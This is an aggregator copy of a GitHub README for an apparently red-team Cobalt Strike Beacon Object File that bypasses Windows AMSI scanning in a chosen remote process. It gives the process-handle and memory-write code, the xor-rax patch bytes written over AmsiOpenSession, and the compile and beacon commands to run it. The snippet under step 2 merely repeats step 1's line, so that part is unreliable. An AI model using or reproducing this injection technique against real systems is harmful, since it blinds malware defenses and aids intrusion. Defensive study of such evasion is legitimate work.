15
GitHub - boku7/injectAmsiBypass: Cobalt Strike BOF - Bypass AMSI in a remote pro...
source link: https://github.com/boku7/injectAmsiBypass
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Cobalt Strike BOF - Inject AMSI Bypass
Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.
Running inject-amsiBypass BOF from CobaltStrike
What does this do?
1. Use supplied PID argument to get a handle on the remote process
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
2. Load AMSI.DLL into beacons memory and get the address of AMSI.AmsiOpenSession
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
- Both beacon and the target process will both have the same address for the symbol.
- If AMSI.DLL does not exist in the remote process, running this may crash the target process.
3. Write the AMSI bypass to the remote processes memory
unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);
Method = AMSI.AmsiOpenSession
- Uses the AMSI bypass technique taught in Offensive Security's PEN-300/OSEP (Evasion Techniques and Breaching Defenses) course.
Proof of Concept Demo Screenshots
Before - Powershell.exe AMSI.AmsiOpenSession
After - Powershell.exe AMSI.AmsiOpenSession
Compile with x64 MinGW:
x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o
Run from Cobalt Strike Beacon Console
beacon> inject-amsiBypass <PID>
- Make sure to load the inject-amsiBypass.cna script into Cobalt Strikes Script Manager
To Do List
- Check that AMSI.DLL exists in remote process before injection
- Add other AMSI bypasses to inject
- Support x86
Credits / References
Raphael Mudge - Beacon Object Files - Luser Demo
Cobalt Strike - Beacon Object Files
BOF Code References
ajpc500/BOFs trustedsec/CS-Situational-Awareness-BOFSektor7 Malware Dev Essentials course
Offensive Security OSEP
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK